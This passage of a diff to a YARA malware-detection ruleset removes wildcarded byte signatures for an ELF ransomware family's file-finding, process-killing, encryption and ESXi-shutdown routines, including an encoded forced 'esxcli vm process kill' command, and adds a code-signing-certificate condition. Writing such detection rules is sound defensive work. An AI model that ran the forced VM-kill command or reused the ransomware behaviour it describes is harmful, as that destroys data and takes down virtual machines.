-            ?? ?? 8B 4E ?? 8B 5E ?? 31 D1 31 C3 09 CB 0F 84 ?? ?? ?? ?? 31 FF 81 C4 ?? ?? ?? ??
-            89 F8 5B 5E 5F 5D C3 8D 74 26 ?? 90 8B 5C 24 ?? E8 ?? ?? ?? ?? 89 C7 8B 00 83 F8 ??
-            0F 85 ?? ?? ?? ?? 83 EC ?? FF 74 24 ?? 55 6A ?? 8B 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ??
-            85 C0 0F 85 ?? ?? ?? ?? BF ?? ?? ?? ?? C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? E9 ??
-            ?? ?? ?? 8D 74 26 ?? 90 89 54 24 ?? 8B 94 24 ?? ?? ?? ?? 89 44 24 ?? 8B 84 24 ?? ??
-            ?? ?? 89 74 24 ?? 89 44 24 ?? 89 54 24 ?? 85 F6 0F 84 ?? ?? ?? ?? 8B 46 ?? 8B 4C 24
-            ?? 83 C0 ?? 83 C1 ?? 89 44 24 ?? 89 44 24 ?? 8B 46 ?? 89 4C 24 ?? 89 4C 24 ?? 89 44
-        }
-		$find_files_v1_p2 = {
-            24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 83 FF ?? 0F 84 ?? ?? ?? ?? 8B
-            84 24 ?? ?? ?? ?? 83 E0 ?? 89 44 24 ?? 75 ?? 8D 44 24 ?? 50 FF 74 24 ?? FF 74 24 ??
-            55 8B 44 24 ?? FF D0 89 C7 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 85 F6 74 ?? 8B 84 24 ??
-            ?? ?? ?? 8B 5C 24 ?? 89 6C 24 ?? 8B 4C 24 ?? 8B BC 24 ?? ?? ?? ?? 89 C5 EB ?? 8D B6
-            ?? ?? ?? ?? 8B 36 85 F6 74 ?? 8B 46 ?? 8B 56 ?? 31 D8 31 CA 09 C2 75 ?? 8B 46 ?? 8B
-            56 ?? 31 E8 31 FA 09 C2 0F 84 ?? ?? ?? ?? 8B 36 85 F6 75 ?? 8B 6C 24 ?? 8B 7C 24 ??
-            85 FF 74 ?? 80 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? 8B 44 24 ?? C6 44 05 ?? ?? 8B 44 24 ??
-            85 C0 0F 84 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 74 24 ?? FF 74 24 ?? 55 8B 44 24 ?? FF D0
-            83 C4 ?? 89 C7 81 C4 ?? ?? ?? ?? 89 F8 5B 5E 5F 5D C3 66 90 83 EC ?? 6A ?? 55 8B 5C
-            24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 89 44 24 ?? 89 C7 E8 ?? ?? ?? ?? 8B 00 89 44 24 ??
-            83 C4 ?? 85 FF 79 ?? 83 F8 ?? 0F B6 4C 24 ?? BA ?? ?? ?? ?? 0F 94 C0 84 C0 B8 ?? ??
-            ?? ?? 0F 44 44 24 ?? 0F 45 CA 89 44 24 ?? 88 4C 24 ?? 8B 44 24 ?? 85 C0 0F 85 ?? ??
-            ?? ?? 83 EC ?? FF 74 24 ?? 8B 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8D B4
-            26 ?? ?? ?? ?? 8D 76 ?? 89 54 24 ?? 8B 94 24 ?? ?? ?? ?? 89 44 24 ?? 8B 84 24 ?? ??
-            ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 89 54 24 ?? 8B 44 24 ?? C7 44 24 ?? ?? ??
-            ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 48 ?? 89 4C 24 ?? 89 4C 24 ?? 85 C0 74 ?? 80 7C 05
-            ?? ?? 74 ?? E9 ?? ?? ?? ?? 8D 76 ?? 80 7C 05 ?? ?? 0F 85 ?? ?? ?? ?? 83 E8 ?? 75 ??
-            31 D2 89 54 24 ?? E9 ?? ?? ?? ?? 8D 74 26 ?? 90 89 54 24 ?? 8B 94 24 ?? ?? ?? ?? 89
-        }
-		$find_files_v1_p3 = {
-            44 24 ?? 8B 84 24 ?? ?? ?? ?? 89 74 24 ?? 89 44 24 ?? 89 54 24 ?? E9 ?? ?? ?? ?? 90
-            8B 84 24 ?? ?? ?? ?? BF ?? ?? ?? ?? C6 44 24 ?? ?? 83 E0 ?? 83 F8 ?? 19 C0 83 E0 ??
-            83 C0 ?? 89 44 24 ?? E9 ?? ?? ?? ?? 8D B4 26 ?? ?? ?? ?? 90 8B 74 24 ?? 85 F6 0F 88
-            ?? ?? ?? ?? 83 EC ?? FF 74 24 ?? 8B 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 C6 85 C0 0F
-            84 ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B 44 24 ?? 89 44 24 ?? 8D B4 26 ?? ?? ?? ?? 8D 76 ??
-            83 EC ?? 56 8B 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 80 78 ?? ??
-            0F 84 ?? ?? ?? ?? 83 EC ?? 8D 78 ?? 57 8B 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 3B 44 24
-            ?? 0F 83 ?? ?? ?? ?? 8B 44 24 ?? 83 EC ?? C6 44 05 ?? ?? 57 8B 44 24 ?? 01 E8 50 8B
-            5C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 5A 5B 8D 48 ?? 8D 44 24 ?? 50 89 E8 FF B4 24 ??
-            ?? ?? ?? 8B 54 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 EC ?? 89 C7
-            56 8B 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 66 90 80 78 ?? ?? 0F 84 ?? ??
-            ?? ?? 66 83 78 ?? ?? 0F 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D B6 ?? ?? ?? ?? 80 7C 05 ??
-            ?? 8D 48 ?? 89 C2 0F 84 ?? ?? ?? ?? 85 C9 0F 84 ?? ?? ?? ?? 80 7C 05 ?? ?? 8D 50 ??
-            75 ?? E9 ?? ?? ?? ?? 8D B4 26 ?? ?? ?? ?? 66 90 89 C2 85 D2 0F 84 ?? ?? ?? ?? 80 7C
-            15 ?? ?? 8D 42 ?? 75 ?? E9 ?? ?? ?? ?? 8D B4 26 ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ??
-            31 FF C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 EC ?? 56 8B 5C 24 ??
-            E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B 07 E9 ?? ?? ?? ?? 8B 7C 24 ?? 89 FB BF ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? C7 00 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? E9 ??
-            ?? ?? ?? BF
-        }
-		$kill_processes_v1_p1 = {
-            55 BA ?? ?? ?? ?? B8 ?? ?? ?? ?? BD ?? ?? ?? ?? 57 89 E9 56 53 E8 ?? ?? ?? ?? 81 C3
-            ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 66 89 54 24 ?? 8D 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D B3 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
-            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C6 44 24
-            ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44
-            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 66 89 44 24 ??
-            C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
-            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C6 44 24 ?? ?? 8B 83 ?? ?? ?? ??
-            89 44 24 ?? 8B 83 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? F3 A5 8D B4 24 ?? ?? ?? ?? C6 44
-        }
-		$kill_processes_v1_p2 = {
-            24 ?? ?? 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? 89 F7 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
-            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 CD C7 44 24 ?? ?? ??
-            ?? ?? B9 ?? ?? ?? ?? 89 E8 F3 AB FF B4 24 ?? ?? ?? ?? 89 F7 8D 44 24 ?? 50 56 E8 ??
-            ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 83 C4 ?? 89 E8 B9 ?? ?? ?? ?? F3 AB FF B4 24 ?? ??
-            ?? ?? 89 F7 8D 44 24 ?? 50 56 E8 ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 83 C4 ?? 89 E8
-            B9 ?? ?? ?? ?? F3 AB FF B4 24 ?? ?? ?? ?? 89 F7 8D 44 24 ?? 50 56 E8 ?? ?? ?? ?? 89
-            34 24 E8 ?? ?? ?? ?? 83 C4 ?? 89 E8 B9 ?? ?? ?? ?? F3 AB FF B4 24 ?? ?? ?? ?? 89 F7
-            8D 44 24 ?? 50 56 E8 ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 83 C4 ?? 89 E8 B9 ?? ?? ??
-            ?? F3 AB FF B4 24 ?? ?? ?? ?? 89 F7 8D 84 24 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 89 34
-            24 E8 ?? ?? ?? ?? 83 C4 ?? 89 E8 B9 ?? ?? ?? ?? F3 AB FF B4 24 ?? ?? ?? ?? 89 F7 8D
-            44 24 ?? 50 56 E8 ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 83 C4 ?? 89 E8 B9 ?? ?? ?? ??
-            F3 AB FF B4 24 ?? ?? ?? ?? 8D 44 24 ?? 50 56 E8 ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ??
-            81 C4 ?? ?? ?? ?? 5B 5E 5F 5D C3
-        }
-		$shut_down_esxi_v1 = {
-            55 B8 ?? ?? ?? ?? BD ?? ?? ?? ?? 57 89 C1 56 53 E8 ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? 81
-            EC ?? ?? ?? ?? 8D 7C 24 ?? C7 44 24 ?? 65 73 78 63 C7 44 24 ?? 6C 69 20 76 C7 44 24
-            ?? 6D 20 70 72 8D B3 ?? ?? ?? ?? C7 44 24 ?? 6F 63 65 73 F3 A5 8D B4 24 ?? ?? ?? ??
-            C7 44 24 ?? 73 20 6B 69 83 EC ?? 89 F7 C7 44 24 ?? 6C 6C 20 2D C7 44 24 ?? 2D 74 79
-            70 C7 44 24 ?? 65 3D 66 6F C7 44 24 ?? 72 63 65 20 C7 44 24 ?? 2D 2D 77 6F 89 C8 B9
-            ?? ?? ?? ?? C7 44 24 ?? 72 6C 64 2D C7 44 24 ?? 69 64 3D 22 C7 84 24 ?? ?? ?? ?? 25
-            73 22 00 C7 44 24 ?? 5B 45 53 58 C7 44 24 ?? 69 5D 20 53 C7 44 24 ?? 68 75 74 74 C7
-            44 24 ?? 69 6E 67 20 C7 44 24 ?? 64 6F 77 6E F3 AB C7 44 24 ?? 20 2D 20 25 8D 83 ??
-            ?? ?? ?? 66 89 6C 24 ?? C6 44 24 ?? ?? 50 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? 85 C0 0F 84 ?? ?? ?? ?? BF ?? ?? ?? ?? 89 C5 8D 44 24 ?? 66 89 7C 24 ?? 31 FF
-        }
-		$kill_processes_v2_p1 = {
-            41 54 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? 45 31 E4 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 55 48 89
-            FD 53 48 81 EC ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 00 00 48 89 84 24 ?? ?? ?? ?? B8 ?? ??
-            ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 48 8D B4 24 ?? ?? ?? ?? 0F 29 84 24 ?? ?? ?? ?? 66 0F
-            6F 05 ?? ?? 00 00 48 89 DF 66 89 44 24 ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 0F 29 44 24
-            ?? 66 0F 6F 05 ?? ?? 00 00 66 89 54 24 ?? 48 89 EA 0F 29 44 24 ?? 66 0F 6F 05 ?? ??
-            00 00 66 89 8C 24 ?? ?? 00 00 B9 ?? ?? ?? ?? 0F 29 44 24 ?? 66 0F 6F 05 ?? ?? 00 00
-            C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 0F 29 84 24 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 00 00 C6
-            84 24 ?? ?? ?? ?? ?? 0F 29 84 24 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 00 00 C7 44 24 ?? ??
-            ?? ?? ?? 0F 29 84 24 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 00 00 C6 44 24 ?? ?? 0F 29 84 24
-            ?? ?? ?? ?? C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? C6 44 24 ?? ?? C7 84 24 ?? ?? ??
-            ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 48 89 44 24 ?? 48 B8
-        }
-		$kill_processes_v2_p2 = {
-            48 89 44 24 ?? 4C 89 E0 F3 48 AB 48 89 DF C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 4C 89 E0 48 89 DF B9 ??
-            ?? ?? ?? F3 48 AB 48 8D 74 24 ?? 48 89 EA 48 89 DF E8 ?? ?? ?? ?? 48 89 DF E8 ?? ??
-            ?? ?? 4C 89 E0 48 89 DF B9 ?? ?? ?? ?? F3 48 AB 48 8D 74 24 ?? 48 89 EA 48 89 DF E8
-            ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 4C 89 E0 48 89 DF B9 ?? ?? ?? ?? F3 48 AB 48 8D
-            74 24 ?? 48 89 EA 48 89 DF E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 4C 89 E0 48 89 DF
-            B9 ?? ?? ?? ?? F3 48 AB 48 8D B4 24 ?? ?? ?? ?? 48 89 EA 48 89 DF E8 ?? ?? ?? ?? 48
-            89 DF E8 ?? ?? ?? ?? 4C 89 E0 48 89 DF B9 ?? ?? ?? ?? F3 48 AB 48 8D 74 24 ?? 48 89
-            EA 48 89 DF E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 4C 89 E0 48 89 DF B9 ?? ?? ?? ??
-            F3 48 AB 48 8D 74 24 ?? 48 89 EA 48 89 DF E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48
-            81 C4 ?? ?? ?? ?? 5B 5D 41 5C C3
-        }
-		$encrypt_files_v2_p1 = {
-            48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 41 57 66 0F EF C0 49 89 FF 41 56 49 89 D6 41 55 49 89
-            F5 BE ?? ?? ?? ?? 41 54 55 53 48 81 EC ?? ?? ?? ?? 48 8D 5C 24 ?? 48 89 4C 24 ?? 48
-            8D AC 24 ?? ?? ?? ?? 48 89 DF 4C 89 04 24 0F 29 44 24 ?? 0F 29 44 24 ?? 0F 29 44 24
-            ?? 48 C7 44 24 ?? ?? ?? ?? ?? 0F 29 44 24 ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? 85 C0 75
-            ?? 45 31 E4 48 89 EF BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 DF BE ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 48 8D 7B ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 44 89 E0 5B 5D
-            41 5C 41 5D 41 5E 41 5F C3 0F 1F 80 ?? ?? ?? ?? 48 8D 7B ?? BE ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 85 C0 74 ?? BA ?? ?? ?? ?? 48 89 DE 48 89 EF E8 ?? ?? ?? ?? 48 8D 35 ?? ?? ??
-            ?? 4C 89 FF E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 85 C0 0F 84 ?? ?? ?? ?? 4C 89 FF E8 ??
-            ?? ?? ?? 4C 89 FE 4C 89 EF 48 89 C2 49 89 C4 E8 ?? ?? ?? ?? 8B 54 24 ?? 4B 8D 44 25
-            ?? 31 F6 89 10 0F B7 54 24 ?? 66 89 50 ?? 0F B6 54 24 ?? 88 50 ?? BA ?? ?? ?? ?? 43
-            C6 44 25 ?? ?? 4C 8B 64 24 ?? 4C 89 E7 E8 ?? ?? ?? ?? 4C 89 E7 4C 89 64 24 ?? 45 31
-            E4 E8 ?? ?? ?? ?? 48 83 F8 ?? 7E ?? 4C 89 EE 4C 89 FF E8 ?? ?? ?? ?? 85 C0 74 ?? 48
-            8B 7C 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 66 0F 1F 44 00 ?? 48 8B 7C 24 ?? E8 ?? ??
-            ?? ?? 48 8D 35 ?? ?? ?? ?? 4C 89 EF E8 ?? ?? ?? ?? 48 89 44 24 ?? 49 89 C4 48 85 C0
-        }
-		$encrypt_files_v2_p2 = {
-            0F 84 ?? ?? ?? ?? 31 F6 BA ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E7 4C 89 64 24
-            ?? E8 ?? ?? ?? ?? 48 39 44 24 ?? 48 0F 4E 44 24 ?? 48 8D 7C 24 ?? 48 89 C1 48 C1 F9
-            ?? 48 C1 E9 ?? 48 8D 14 08 83 E2 ?? 48 29 CA 48 29 D0 48 89 44 24 ?? E8 ?? ?? ?? ??
-            48 8D BC 24 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89 DE 48 89 44 24 ?? 31 C0 BA ?? ?? ?? ??
-            F3 48 AB 48 8D 84 24 ?? ?? ?? ?? 48 8B 3C 24 48 89 C1 48 89 44 24 ?? E8 ?? ?? ?? ??
-            41 89 C4 85 C0 0F 84 ?? ?? ?? ?? 48 8B 7C 24 ?? E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 4C 89
-            EE E8 ?? ?? ?? ?? 41 89 C4 85 C0 0F 84 ?? ?? ?? ?? 48 8B 44 24 ?? 4C 8D 64 24 ?? 48
-            85 C0 75 ?? E9 ?? ?? ?? ?? 0F 1F 80 ?? ?? ?? ?? 4D 89 F1 4D 89 E8 4C 89 E9 4C 89 E2
-            48 89 EE 48 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 F6 BA ?? ?? ?? ?? 4C 89 FF 48 F7
-            DE E8 ?? ?? ?? ?? 4C 89 F9 4C 89 F2 BE ?? ?? ?? ?? 4C 89 EF E8 ?? ?? ?? ?? 48 8B 44
-            24 ?? 4C 29 F0 48 89 44 24 ?? 74 ?? 49 39 C6 4C 8B 7C 24 ?? BE ?? ?? ?? ?? 4C 89 EF
-            4C 0F 47 F0 66 0F 6F 4C 24 ?? 4C 89 F9 4C 89 F2 0F 29 4C 24 ?? E8 ?? ?? ?? ?? 4C 39
-            F0 74 ?? 48 8B 7C 24 ?? 41 BC ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 4C 89 FE 4C
-            89 EF E8 ?? ?? ?? ?? E9
-        }
-		$find_files_v2_p1 = {
-            41 57 4D 89 C7 41 56 49 89 FE 41 55 49 89 FD 41 54 55 53 89 CB 48 81 EC ?? ?? ?? ??
-            48 89 34 24 89 54 24 ?? 41 8B 55 ?? 49 83 C5 ?? 8D 82 ?? ?? ?? ?? F7 D2 21 D0 25 ??
-            ?? ?? ?? 74 ?? 89 C2 C1 EA ?? A9 ?? ?? ?? ?? 0F 44 C2 49 8D 55 ?? 4C 0F 44 EA 89 C6
-            40 00 C6 49 83 DD ?? 31 ED 4D 29 F5 74 ?? 49 8D 6D ?? 43 80 7C 2E ?? ?? 49 0F 45 ED
-            48 8D 44 24 ?? 41 89 DC 4C 89 F6 48 89 44 24 ?? 48 89 C2 BF ?? ?? ?? ?? 41 83 E4 ??
-            0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 00 83 F8
-            ?? 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 45 31 DB 41 BC ?? ?? ?? ?? 48 8B 44 24 ?? F6 C3
-            ?? 0F 85 ?? ?? ?? ?? 48 89 44 24 ?? 48 8B 44 24 ?? 4C 89 7C 24 ?? 48 89 44 24 ?? 4D
-            85 FF 0F 84 ?? ?? ?? ?? 41 8B 47 ?? 8D 55 ?? 89 54 24 ?? 83 C0 ?? 89 44 24 ?? 89 44
-            24 ?? 41 8B 47 ?? 89 44 24 ?? 45 31 C0 C7 44 24 ?? ?? ?? ?? ?? 83 F9 ?? 0F 84 ?? ??
-            ?? ?? 89 D8 83 E0 ?? 89 44 24 ?? 75 ?? 44 88 5C 24 ?? 44 89 E2 48 8D 4C 24 ?? 4C 89
-            F7 48 8B 74 24 ?? 48 8B 04 24 44 89 44 24 ?? FF D0 44 8B 44 24 ?? 44 0F B6 5C 24 ??
-            85 C0 89 C2 75 ?? 4D 85 FF 0F 84 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 54 24 ?? EB ?? 0F
-            1F 44 00 ?? 4D 8B 3F 4D 85 FF 0F 84 ?? ?? ?? ?? 49 39 47 ?? 75 ?? 49 39 57 ?? 75 ??
-            31 D2 48 81 C4 ?? ?? ?? ?? 89 D0 5B 5D 41 5C 41 5D 41 5E 41 5F C3 66 90 E8 ?? ?? ??
-            ?? 85 C0 78 ?? 8B 44 24 ?? 25 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 3D ?? ??
-            ?? ?? 0F 84 ?? ?? ?? ?? 31 C9 45 31 DB 45 31 E4 48 8B 44 24 ?? F6 C3 ?? 0F 84 ?? ??
-            ?? ?? 4D 85 FF 0F 84 ?? ?? ?? ?? 49 39 47 ?? 75 ?? 48 89 44 24 ?? 48 8B 44 24 ?? 4C
-        }
-		$find_files_v2_p2 = {
-            89 7C 24 ?? 48 89 44 24 ?? E9 ?? ?? ?? ?? 66 2E 0F 1F 84 00 ?? ?? 00 00 E8 ?? ?? ??
-            ?? 49 89 C4 8B 00 83 F8 ?? 0F 85 ?? ?? ?? ?? 48 8B 54 24 ?? 4C 89 F6 BF ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 45 31 DB 41 BC ?? ?? ?? ?? EB
-            ?? 0F 1F 00 8B 4C 24 ?? 85 C9 74 ?? 45 84 DB 0F 85 ?? ?? ?? ?? 8B 44 24 ?? 43 C6 04
-            2E ?? 85 C0 0F 84 ?? ?? ?? ?? 44 89 E2 48 8D 4C 24 ?? 48 8B 74 24 ?? 4C 89 F7 48 8B
-            04 24 FF D0 89 C2 E9 ?? ?? ?? ?? 90 31 F6 4C 89 F7 31 C0 44 88 5C 24 ?? E8 ?? ?? ??
-            ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 7C 24 ?? 44 0F B6 5C 24 ?? 44 8B 00 85 FF 79 ?? 41
-            83 F8 ?? BA ?? ?? ?? ?? 0F 94 C0 84 C0 B8 ?? ?? ?? ?? 44 0F 45 DA 44 0F 45 E0 8B 74
-            24 ?? 85 F6 0F 85 ?? ?? ?? ?? 8B 7C 24 ?? 44 88 5C 24 ?? 44 89 44 24 ?? E8 ?? ?? ??
-            ?? 44 0F B6 5C 24 ?? 44 8B 44 24 ?? E9 ?? ?? ?? ?? 0F 1F 00 48 89 44 24 ?? 48 8B 44
-            24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 89 44 24 ?? 8D 45 ?? C7 44 24 ?? ?? ?? ?? ?? 89
-            44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 48 85 ED 74 ?? 41 80 3C 2E ?? 48 89 E8 74 ?? E9 ??
-            ?? ?? ?? 0F 1F 44 00 ?? 41 80 3C 06 ?? 0F 85 ?? ?? ?? ?? 48 83 E8 ?? 75 ?? 31 D2 89
-        }
-		$find_files_v2_p3 = {
-            54 24 ?? E9 ?? ?? ?? ?? 0F 1F 40 ?? 89 D8 B9 ?? ?? ?? ?? 41 BB ?? ?? ?? ?? 83 E0 ??
-            83 F8 ?? 45 19 E4 41 83 E4 ?? 41 83 C4 ?? E9 ?? ?? ?? ?? 0F 1F 44 00 ?? 8B 54 24 ??
-            85 D2 0F 88 ?? ?? ?? ?? 8B 7C 24 ?? E8 ?? ?? ?? ?? 49 89 C7 48 85 C0 0F 84 ?? ?? ??
-            ?? B8 ?? ?? ?? ?? 44 89 64 24 ?? 4C 29 E8 48 89 44 24 ?? 48 8D 44 24 ?? 48 89 44 24
-            ?? 8B 44 24 ?? 83 E8 ?? 89 44 24 ?? 4C 89 FF E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ??
-            ?? 80 78 ?? ?? 74 ?? 4C 8D 60 ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 3B 44 24 ?? 0F 83 ?? ??
-            ?? ?? 41 C6 04 2E ?? 49 8D 7C 2E ?? 4C 89 E6 E8 ?? ?? ?? ?? 4C 8B 44 24 ?? 8B 54 24
-            ?? 89 D9 48 8B 34 24 4C 89 F7 E8 ?? ?? ?? ?? 85 C0 74 ?? 4C 89 FF 89 04 24 E8 ?? ??
-            ?? ?? 8B 14 24 E9 ?? ?? ?? ?? 66 90 80 78 ?? ?? 74 ?? 66 83 78 ?? ?? 75 ?? EB ?? 90
-            41 80 7C 06 ?? ?? 48 8D 70 ?? 89 C2 0F 84 ?? ?? ?? ?? 48 85 F6 0F 84 ?? ?? ?? ?? 41
-            80 7C 06 ?? ?? 48 8D 50 ?? 75 ?? E9 ?? ?? ?? ?? 0F 1F 40 ?? 48 89 C2 48 85 D2 0F 84
-            ?? ?? ?? ?? 41 80 7C 16 ?? ?? 48 8D 42 ?? 75 ?? E9 ?? ?? ?? ?? 0F 1F 00 45 85 E4 0F
-            84 ?? ?? ?? ?? 31 C9 45 31 DB 41 BC ?? ?? ?? ?? E9 ?? ?? ?? ?? 4C 89 FF 44 8B 64 24
-            ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 41 8B 04 24 E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 FF
-            C7 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? E9 ?? ?? ?? ?? BA ?? ?? ?? ?? E9 ??
-            ?? ?? ?? 48 89 F2 E9 ?? ?? ?? ?? 44 89 04 24 E8 ?? ?? ?? ?? 44 8B 04 24 BA ?? ?? ??
-            ?? 44 89 00 E9 ?? ?? ?? ?? 8B 7C 24 ?? E8 ?? ?? ?? ?? 83 CA ?? E9
-        }
-		$init_key_v2 = {
-            48 85 FF 0F 84 ?? ?? ?? ?? 48 85 F6 0F 84 ?? ?? ?? ?? 41 56 41 55 41 54 55 48 89 F5
-            53 48 89 FB 48 81 EC ?? ?? ?? ?? 4C 8D 64 24 ?? 4C 89 E7 E8 ?? ?? ?? ?? 85 C0 75 ??
-            66 0F EF C0 48 8D 35 ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? 49 89 E6 0F 29 04 24 0F 29 44
-            24 ?? E8 ?? ?? ?? ?? 49 89 C5 48 85 C0 74 ?? 4C 89 F7 48 89 C1 BA ?? ?? ?? ?? BE ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 EF E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 4C 89 F6 4C 89 E7 E8
-            ?? ?? ?? ?? 85 C0 74 ?? 31 C0 48 81 C4 ?? ?? ?? ?? 5B 5D 41 5C 41 5D 41 5E C3 66 2E
-            0F 1F 84 00 ?? ?? 00 00 31 C0 C3 0F 1F 44 00 ?? 48 89 EA 48 89 DE 4C 89 E7 E8 ?? ??
-            ?? ?? 85 C0 75 ?? 4C 89 E7 E8 ?? ?? ?? ?? 89 E8 EB
-        }
-
 	condition:
-		uint32( 0 ) == 0x464C457F and ( ( ( all of ( $find_files_v1_p* ) ) and ( all of ( $kill_processes_v1_p* ) ) and ( $init_key_v1 ) and ( all of ( $encrypt_files_v1_p* ) ) and ( $shut_down_esxi_v1 ) ) or ( ( all of ( $find_files_v2_p* ) ) and ( all of ( $kill_processes_v2_p* ) ) and ( $init_key_v2 ) and ( all of ( $encrypt_files_v2_p* ) ) ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Shanghai XuSong investment partnership Enterprise(Limited)" and pe.signatures [ i ] . serial == "0f:62:f7:60:70:4b:df:8d:c3:0c:7b:aa:73:76:f4:84" and 1659398400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Mcburglar : TC_DETECTION MALICIOUS MALWARE FILE
+
